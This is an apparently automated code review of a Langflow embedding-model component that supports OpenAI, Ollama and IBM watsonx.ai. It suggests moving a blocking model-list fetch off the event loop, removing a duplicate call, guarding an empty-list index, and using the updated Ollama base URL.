| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). 
Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == 
\"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = 
False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n 
build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | ||
| }, |
🛠️ Refactor suggestion | 🟠 Major
Avoid blocking calls and duplicate fetches when listing IBM models.
fetch_ibm_models makes a synchronous requests call inside the async update_build_config and is invoked twice for the same value. Offload it to a thread and fetch once to prevent event-loop stalls and redundant I/O. Guard the [0] lookup as well, since an empty model list would raise IndexError.
Apply this minimal change inside the EmbeddingModelComponent code block:
+import asyncio
@@
- elif field_value == "IBM watsonx.ai":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+ elif field_value == "IBM watsonx.ai":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")
@@
- elif field_name == "base_url_ibm_watsonx":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+ elif field_name == "base_url_ibm_watsonx":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")
Committable suggestion skipped: line range outside the PR's diff.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.
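A minimal, self-contained sketch of the fetch-once, off-loop pattern suggested above. It is an illustration under stated assumptions, not the component's code: `fetch_models` is a hypothetical stand-in for `fetch_ibm_models` (it sleeps instead of calling the watsonx.ai API), `refresh_models` is a hypothetical helper, and `build_config` is a plain dict rather than a `dotdict`. Only `asyncio.to_thread` (Python 3.9+) is a real API here.

```python
import asyncio
import time


def fetch_models(base_url: str) -> list[str]:
    """Hypothetical blocking fetch; stands in for a synchronous requests.get call."""
    time.sleep(0.05)  # simulate network latency
    return sorted(["model-b", "model-a"]) if base_url else []


async def refresh_models(build_config: dict, base_url: str) -> dict:
    # Run the blocking call in a worker thread so the event loop stays responsive,
    # and call it once, reusing the result for both "options" and "value".
    models = await asyncio.to_thread(fetch_models, base_url)
    build_config["model"]["options"] = models
    # Guard against an empty list instead of indexing [0] unconditionally.
    build_config["model"]["value"] = models[0] if models else ""
    return build_config


if __name__ == "__main__":
    config = {"model": {"options": [], "value": ""}}
    print(asyncio.run(refresh_models(config, "https://example.invalid")))
```

The same shape should apply to both the provider branch and the base_url_ibm_watsonx branch; only the URL passed in differs.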
Fix: use the updated value in Ollama base URL refresh.
The ollama_base_url handler ignores field_value and always reads self.ollama_base_url, so the model list can be refreshed against the previous URL and go stale.
Apply:
- elif field_name == "ollama_base_url":
+ elif field_name == "ollama_base_url":
@@
- ollama_url = self.ollama_base_url
+ ollama_url = field_value or self.ollama_base_url
📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). 
Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == 
\"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = 
False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n 
build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | |
| }, | |
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). 
